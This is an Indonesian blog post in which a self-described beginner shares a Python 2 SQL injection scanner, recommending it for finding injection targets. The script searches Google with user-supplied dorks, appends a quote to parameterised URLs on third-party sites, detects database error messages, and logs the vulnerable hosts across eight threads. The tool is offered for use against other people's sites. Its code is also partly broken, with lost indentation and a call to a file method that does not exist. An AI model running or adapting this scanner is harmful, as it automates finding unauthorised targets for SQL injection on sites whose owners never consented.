Sql scanner .... (.py)

kemarin-kemarin kerjaanx gw cuma nyari2 tools ... yah maklumlah masih kiddie ...hehehe ...
sambil perlahan-lahan pelajari tuh script2 python yg lumayan bikin pusing, ngak pa2 pelan tapi pasti, situs darkc0de salah satu yg ngasih kita banyak tools scanner yg bisa di manfaatkan, tp sayang nich situs udah jadi komersil, script nich lumayan bagus buat nyari2 target sql injection ...

#!/usr/bin/python
# http://thepurgatory.com __
# ___ __ _________ ____ _/ /____ ______ __
# / _ \/ // / __/ _ `/ _ `/ __/ _ \/ __/ // /
# / .__/\_,_/_/ \_, /\_,_/\__/\___/_/ \_, /
# /_/ /___/ /___/
# ___________ _ __
# SQLi Scanner by rCom / __/ __/ -_) |/|/ /
# root.localhost@live.com \__/_/ \__/|__,__/
#
#####################################################

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os
from random import choice
from optparse import OptionParser
os.system(['clear','cls'][os.name == 'nt'])
threads = []
numthreads = 8
timeout = 4
socket.setdefaulttimeout(timeout)
version = '0.1a'
ldm = 'jun_22_09'

rSA = [2,3,4,5,6]

CXdic = {'blackle': '013269018370076798483:gg7jrrhpsy4',
'ssearch': '008548304570556886379:0vtwavbfaqe',
'redfront': '017478300291956931546:v0vo-1jh2y4',}

SQLeD = {'MySQL(Syntax)': 'error in your SQL syntax',
'MySQL(fetch_array)': 'mysql_fetch_array',
'MySQL(fetch_assoc)': 'mysql_fetch_assoc',
'MySQL(num_rows)': 'mysql_num_rows',
'MSSQL_OLEdb': 'Microsoft OLE DB Provider',
'MSSQL_Uqm': 'Unclosed quotation mark',
'MS-Access_ODBC': 'ODBC Microsoft Access Driver',}


filetypes = ['php','php2','asp','aspx','jsp','htm','html']

header = ['Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)']

gnum = 100

def searchIt(go_dork,go_search,go_ftype,maxc):
uRLS = []
counter = 0
while counter < int(maxc):
jar = cookielib.FileCookieJar("cookies")
query = 'q='+go_dork+'+'+go_ftype
results_web = 'http://www.google.com/cse?'+go_search+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
request_web = urllib2.Request(results_web)
agent = random.choice(header)
request_web.add_header('User-Agent', agent)
opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
text = opener_web.open(request_web).read()
strreg = re.compile('(?<=href=")(.*?)(?=")')
names = strreg.findall(text)
counter += 100
for name in names:
if name not in uRLS:
if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
pass
elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
pass
else:
uRLS.append(name)
tmpList = []; finalList = []
for entry in uRLS:
try:
t2host = entry.split("/",3)
domain = t2host[2]
if domain not in tmpList and "=" in entry:
finalList.append(entry)
tmpList.append(domain)
except:
pass
print "\n[!] - Starting scan please wait...."
return finalList

class injThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts;self.fcount = 0
self.check = True
threading.Thread.__init__(self)

def run (self):
urls = list(self.hosts)
for url in urls:
try:
if self.check == True:
ClassicINJ(url)
else:
break
except(KeyboardInterrupt):
self.fcount+=1

def stop(self):
self.check = False


def ClassicINJ(url):
EXT = "'"
host = url+EXT
try:
source = urllib2.urlopen(host).read()
for type,eMSG in SQLeD.items():
if re.search(eMSG, source):
print "\n[!] - Found: ", host
print "[!] - Error: ", type, "\n"
savefile = "vulns.txt"
saved = open(savefile, "a")
saved.write(host+'\n')
saved.remove_duplicates()
saved.close()
else:
pass
except:
print "[?] - Trying: ", host
parser = OptionParser()
parser.add_option("-d" ,type='string', dest='dork',action='store', help="Dork: dork to search for i.e: index.php?id=")
parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="Filetype: Type of file i.e php,asp,aspx (def: php)")
parser.add_option("-e", type='string', dest='engine', action='store', default='blackle', help="Search: Engine to use blackle,ssearch,redfront (def: blackle)")
parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="Results: Maximum number of results to return (def: 500)")
(options, args) = parser.parse_args()
print "\t\t\t+##################################+"
print "\t\t\t# #"
print "\t\t\t# purgScanner #"
print "\t\t\t# coded by rCom #"
print "\t\t\t# -h for help #"
print "\t\t\t# #"
print "\t\t\t+##################################+"

if options.dork != None:
print "\n\n[!] | Dork: \t",options.dork.upper()
go_dork = 'inurl:'+options.dork

if options.dork != None:
if options.filetype in filetypes:
go_ftype = 'inurl:'+options.filetype
else:
go_ftype = 'inurl:php'

go_search = 'engine:'+options.engine.upper()
print "[!] | Type: \t"+options.filetype.upper()
print "[!] | Engine: \t"+options.engine.upper()
print "\n[!] Starting search please wait...."

cuRLS = searchIt(go_dork,go_search,go_ftype,options.maxcount)
fin = True
while fin == True:
i = len(cuRLS) / int(numthreads)
m = len(cuRLS) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = cuRLS[x*i:(x+1)*i]
if (z < m):
sliced.append(cuRLS[int(numthreads)*i+z])
z += 1
thread = injThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
sys.exit()